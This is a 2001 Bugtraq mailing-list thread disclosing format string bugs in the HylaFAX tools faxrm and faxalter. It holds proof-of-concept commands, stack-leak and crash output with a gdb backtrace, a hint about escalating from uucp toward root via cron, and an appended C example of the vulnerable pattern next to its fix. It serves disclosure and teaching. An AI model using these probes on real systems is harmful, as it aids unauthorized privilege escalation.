7168314 2001-09-23 11:50 +0200  /14 lines/  <christer.oberg@gmx.net>
Sent by: joel@lysator.liu.se
Imported: 2001-09-24  18:44  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <19280>
Subject: hylafax
------------------------------------------------------------
From: christer.oberg@gmx.net
To: bugtraq@securityfocus.com
Message-ID: <3629.1001238645@www8.gmx.net>

There are some format string vulnerabilities in the latest hylafax
package; try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of
concept".  Both faxrm and faxalter are installed setuid uucp on
FreeBSD (installed from port collection). uid uucp is not that
exciting but with some luck you'll find uucp owned binaries running
from cron with uid 0.

-- 
Sent through GMX FreeMail - http://www.gmx.net
(7168314) / <christer.oberg@gmx.net>/-----(Rewrapped)
Comment in text 7168568 by Robert van der Meulen <rvdm@cistron.nl>
Comment in text 7171211 by KF <dotslash@snosoft.com>
7168568 2001-09-24 18:54 +0200  /27 lines/ Robert van der Meulen <rvdm@cistron.nl>
Sent by: joel@lysator.liu.se
Imported: 2001-09-24  19:21  by Brevbäraren
External recipient: christer.oberg@gmx.net
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <19281>
Comment to text 7168314 by  <christer.oberg@gmx.net>
Subject: Re: hylafax
------------------------------------------------------------
From: Robert van der Meulen <rvdm@cistron.nl>
To: christer.oberg@gmx.net
Cc: bugtraq@securityfocus.com
Message-ID: <20010924185412.A17611@wiretrip.org>

Hi,

Quoting christer.oberg@gmx.net (christer.oberg@gmx.net):
> There are some format string vulnerabilities in the latest hylafax package;
> try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
> Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
> port collection). uid uucp is not that exciting but with some luck you'll
> find uucp owned binaries running from cron with uid 0.
Just for everyone's I:

This 'works' on Debian stable/unstable, but faxrm/faxalter are
non-suid (as all other hylafax-client binaries).

Greets,
	Robert

-- 
			      Linux Generation
   encrypted mail preferred. finger rvdm@debian.org for my GnuPG/PGP key.
   It's hard to believe they put men on the Moon with only 5K of RAM. -- Wired
(7168568) /Robert van der Meulen <rvdm@cistron.nl>/(Rewrapped)
7171211 2000-09-04 04:54 -0400  /44 lines/ KF <dotslash@snosoft.com>
Sent by: joel@lysator.liu.se
Imported: 2001-09-25  07:37  by Brevbäraren
External recipient: christer.oberg@gmx.net
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <19290>
Comment to text 7168314 by  <christer.oberg@gmx.net>
Subject: Re: hylafax
------------------------------------------------------------
From: KF <dotslash@snosoft.com>
To: christer.oberg@gmx.net
Cc: bugtraq@securityfocus.com
Message-ID: <39B3633B.2AB6F94F@snosoft.com>

Same deal on Mandrake 8.0...

hylafax-client-4.1-5mdk.i586.rpm 

[root@linux /root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586

[root@linux /root]# ls -al /usr/bin/faxalter
-rwxr-xr-x    1 root     root        13380 Aug  6  2001 /usr/bin/faxalter*

[root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown host

[root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
Segmentation fault (core dumped)
[root@linux elguapo]# gdb  /usr/bin/faxalter core

(gdb) bt
#0  0x40209ab7 in vfprintf () from /lib/libc.so.6
#1  0x4020d0f0 in vfprintf () from /lib/libc.so.6
#2  0x40207d7b in vfprintf () from /lib/libc.so.6
#3  0x40066509 in FaxClient::vprintError () from /usr/lib/libfaxutil.so.4.0.1

-KF 

> 
> There are some format string vulnerabilities in the latest hylafax package;
> try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
> Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
> port collection). uid uucp is not that exciting but with some luck you'll
> find uucp owned binaries running from cron with uid 0.
> 
> --
> Sent through GMX FreeMail - http://www.gmx.net
(7171211) /KF <dotslash@snosoft.com>/-----(Rewrapped)
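
The bug class behind the vfprintf crash under FaxClient::vprintError, shown as an added example beside its fix; this is not HylaFAX code and not from any poster in the thread. The names print_error, report_vulnerable, report_fixed and has_conversion are hypothetical, and the "<host>: Unknown host" message layout is an assumption modelled on the output quoted above.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical error printer that forwards to a v*printf function, the
 * shape seen in the backtrace. Declaring it with
 * __attribute__((format(printf, 3, 4))) lets gcc/clang -Wformat-security
 * flag the call in report_vulnerable() at compile time. */
static int print_error(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* BEFORE: the message containing the user-supplied host is used as the
 * format string, so %x/%p/%s in the host consume arguments never passed. */
int report_vulnerable(char *out, size_t n, const char *host)
{
    char msg[256];
    snprintf(msg, sizeof msg, "%s: Unknown host", host);
    return print_error(out, n, msg);   /* host text parsed as a format */
}

/* AFTER: constant format string; the host is only ever data. */
int report_fixed(char *out, size_t n, const char *host)
{
    return print_error(out, n, "%s: Unknown host", host);
}

/* Audit helper: does untrusted text carry a printf conversion?
 * "%%" is a literal percent sign and is not counted. */
int has_conversion(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}

int main(void)
{
    char out[256];
    const char *host = "%p,%p,%p";     /* constructed sample input */
    report_fixed(out, sizeof out, host);
    printf("%s (conversion in input: %d)\n", out, has_conversion(host));
    return 0;
}
```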